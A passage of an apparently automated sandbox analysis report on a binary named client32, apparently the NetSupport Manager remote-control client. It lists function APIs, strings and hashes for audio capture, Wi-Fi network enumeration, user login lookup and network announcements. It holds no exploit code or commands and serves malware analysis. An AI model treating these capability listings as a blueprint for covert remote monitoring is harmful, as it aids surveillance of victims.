                                                                                                                                                                                  • Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc
                                                                                                                                                                                • String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                                                                                                • API String ID: 3091393773-1587594278
                                                                                                                                                                                • Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                                                                                                                • Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
                                                                                                                                                                                • Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                                                                                                                • Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
                                                                                                                                                                                Function 110711C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 285COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • _free.LIBCMT ref: 110712A7
                                                                                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                                                • wsprintfA.USER32 ref: 11071385
                                                                                                                                                                                • wsprintfA.USER32 ref: 110713FD
                                                                                                                                                                                • _memmove.LIBCMT ref: 1107144D
                                                                                                                                                                                Strings
                                                                                                                                                                                • too much data, biguid=%u, thislen=%d, sofar=%d, totlen=%d, more=%d, excess=%d, allzero=%d, Excess: %s, xrefs: 110713F7
                                                                                                                                                                                • Error: %s, xrefs: 110714D4
                                                                                                                                                                                • pEntry->sofar (%d) != pEntry->totlen (%d), uid=%u, pEntry=%xbigdata(%x)=%s, xrefs: 110714C1
                                                                                                                                                                                • Warning. Bigneasy can't alloc %u, xrefs: 11071292
                                                                                                                                                                                • ..\ctl32\Connect.cpp, xrefs: 11071427
                                                                                                                                                                                • Error: ignored last bigneasy data without earlier data (biguid=%d), xrefs: 11071263
                                                                                                                                                                                • %02x , xrefs: 1107137F, 11071490
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf$ErrorFreeHeapLast_free_memmove
                                                                                                                                                                                • String ID: %02x $..\ctl32\Connect.cpp$Error: %s$Error: ignored last bigneasy data without earlier data (biguid=%d)$Warning. Bigneasy can't alloc %u$pEntry->sofar (%d) != pEntry->totlen (%d), uid=%u, pEntry=%xbigdata(%x)=%s$too much data, biguid=%u, thislen=%d, sofar=%d, totlen=%d, more=%d, excess=%d, allzero=%d, Excess: %s
                                                                                                                                                                                • API String ID: 1093916379-3174212670
                                                                                                                                                                                • Opcode ID: 6b18b2cb3d2391d85217396c2bb7a98f1ae1badd8950aecdab4af330d68cd8e4
                                                                                                                                                                                • Instruction ID: ea22814be30d160bcc6a6f2f34e81bedc3e4793a1547ddc51286dcf2c7d1f429
                                                                                                                                                                                • Opcode Fuzzy Hash: 6b18b2cb3d2391d85217396c2bb7a98f1ae1badd8950aecdab4af330d68cd8e4
                                                                                                                                                                                • Instruction Fuzzy Hash: A8B18375E0521A9FDB24CF69CC84B9AF7F9BF44304F1085E9E48997280EB71AA84CF54
                                                                                                                                                                                Function 1102B920 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 220COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 1102BA81
                                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 1102BADE
                                                                                                                                                                                • _fgets.LIBCMT ref: 1102BB10
                                                                                                                                                                                • _strtok.LIBCMT ref: 1102BB38
                                                                                                                                                                                • _fgets.LIBCMT ref: 1102BB74
                                                                                                                                                                                • _strtok.LIBCMT ref: 1102BB88
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_fgets_strtok$ExitMessageProcesswsprintf
                                                                                                                                                                                • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                • API String ID: 3230566946-1484737611
                                                                                                                                                                                • Opcode ID: f16aab1fcd31d47d0d64d6b6022d787ed224ee7ff22f9faf38ea378fc3c8c65d
                                                                                                                                                                                • Instruction ID: 5d6f4620134fd972b767ce717457c33aaf76edba5691a1b8f6aa8fc2ebdb03c0
                                                                                                                                                                                • Opcode Fuzzy Hash: f16aab1fcd31d47d0d64d6b6022d787ed224ee7ff22f9faf38ea378fc3c8c65d
                                                                                                                                                                                • Instruction Fuzzy Hash: EA81F876D00A2D9BDB21DB94DC80FEEF7B8AF04309F4404D9D919A3244EA71AB84CF91
                                                                                                                                                                                Function 1100B440 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 190fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,2520CF5D,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                                                                                                                • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                                                                                                                                • _calloc.LIBCMT ref: 1100B519
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100B53F
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                                                                                                                                  • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(?,2520CF5D,?,00000000,00000000), ref: 1100AD54
                                                                                                                                                                                  • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
                                                                                                                                                                                  • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
                                                                                                                                                                                  • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
                                                                                                                                                                                  • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
                                                                                                                                                                                  • Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
                                                                                                                                                                                  • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
                                                                                                                                                                                  • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,1100CB7A,?), ref: 1100B59E
                                                                                                                                                                                Strings
                                                                                                                                                                                • DisableSounds, xrefs: 1100B472
                                                                                                                                                                                • Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
                                                                                                                                                                                • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
                                                                                                                                                                                • \\.\NSAudioFilter, xrefs: 1100B4E0
                                                                                                                                                                                • Vista new pAudioCap=%p, xrefs: 1100B603
                                                                                                                                                                                • InitCaptureSounds NT6, xrefs: 1100B5BE
                                                                                                                                                                                • Audio, xrefs: 1100B477
                                                                                                                                                                                • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressCloseEventExchangeFileFreeHandleInterlockedLoadProc__wcstoi64_calloc_free
                                                                                                                                                                                • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                                                                                                • API String ID: 2005284756-2362500394
                                                                                                                                                                                • Opcode ID: 7f20d4d6cd1f02e27d80534c7504a3ec719bfa810d155cf278a5dc65844df0aa
                                                                                                                                                                                • Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f20d4d6cd1f02e27d80534c7504a3ec719bfa810d155cf278a5dc65844df0aa
                                                                                                                                                                                • Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1
                                                                                                                                                                                Function 1115B5D0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 94libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • LoadLibraryA.KERNEL32(wlanapi.dll,?,11058627), ref: 1115B61B
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 1115B634
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 1115B644
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 1115B654
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 1115B664
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 1115B674
                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1115B68D
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1115B6A2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$Exception@8LibraryLoadThrowstd::exception::exceptionwsprintf
                                                                                                                                                                                • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                                                                                                                • API String ID: 3939425605-1736626566
                                                                                                                                                                                • Opcode ID: 5d439d3b421e5b7f0a3ed70c93dca791f8eb7264cd491c9464df1327a2587d26
                                                                                                                                                                                • Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
                                                                                                                                                                                • Opcode Fuzzy Hash: 5d439d3b421e5b7f0a3ed70c93dca791f8eb7264cd491c9464df1327a2587d26
                                                                                                                                                                                • Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95
                                                                                                                                                                                Function 11121300 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                                                                                                                  • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                                                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                                                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                                                                                                                  • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                                                                                                                                • _free.LIBCMT ref: 1112131D
                                                                                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                                                • _free.LIBCMT ref: 11121333
                                                                                                                                                                                • _free.LIBCMT ref: 11121348
                                                                                                                                                                                • GdiFlush.GDI32(?,?,1105030A,00000000), ref: 11121350
                                                                                                                                                                                • _free.LIBCMT ref: 1112135D
                                                                                                                                                                                • _free.LIBCMT ref: 11121371
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1112138D
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1112139A
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,1105030A,00000000), ref: 111213A4
                                                                                                                                                                                • DeleteDC.GDI32(?), ref: 111213CB
                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                                                                                                                                • DeleteDC.GDI32(?), ref: 111213EB
                                                                                                                                                                                • InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8
                                                                                                                                                                                Strings
                                                                                                                                                                                • Error deleting membm, e=%d, xrefs: 111213AB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                                                                                                                • String ID: Error deleting membm, e=%d
                                                                                                                                                                                • API String ID: 3195047866-709490903
                                                                                                                                                                                • Opcode ID: 9dfc271f0b675f9e47a1ccd4c42d961d62a5d11d9559e64a981d1d4d236c8ed7
                                                                                                                                                                                • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                                                                                                                                • Opcode Fuzzy Hash: 9dfc271f0b675f9e47a1ccd4c42d961d62a5d11d9559e64a981d1d4d236c8ed7
                                                                                                                                                                                • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                                                                                                                                Function 110537C0 Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 360COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11053A8A
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                  • Part of subcall function 11041F40: inet_ntoa.WSOCK32(00000000,408B018B,1102AA3D,?,11053DB7,?,?,?,2520CF5D,00000001,00000000,?), ref: 11041F52
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountErrorExitLastMessageProcessTickinet_ntoawsprintf
                                                                                                                                                                                • String ID: %s:%u$Announce Error from %s. Invalid crc - ignoring$Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x]$IsA()$ListenPort$NSMWControl32$NSSWControl32$NSTWControl32$Port$TCPIP$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$port
                                                                                                                                                                                • API String ID: 3701541597-1781216912
                                                                                                                                                                                • Opcode ID: ef484a960fd04bdee72a544661832511e0d0731e6a5dd86023771a6ec040d7a7
                                                                                                                                                                                • Instruction ID: 5c383da36f12d4855d2941ef62f3cc5b6d46123aa205a4bcc3d01b822d31dab0
                                                                                                                                                                                • Opcode Fuzzy Hash: ef484a960fd04bdee72a544661832511e0d0731e6a5dd86023771a6ec040d7a7
                                                                                                                                                                                • Instruction Fuzzy Hash: 3AD1A278E0461AABDF84DF94DC91FEEF7B5EF85308F044159E816AB245EB30A904CB61
                                                                                                                                                                                Function 110CF130 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 239COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                                                                                                • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
